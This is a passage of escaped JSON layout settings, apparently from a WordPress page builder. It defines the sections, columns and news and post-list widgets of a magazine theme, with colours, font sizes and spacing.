\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#038fc6\",\"typography_font_size\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"3\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"7oi6ecb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"g7mt24q\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0qdx6b8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tatpigw\",\"elType\":\"column\",\"settings\":{\"_column_s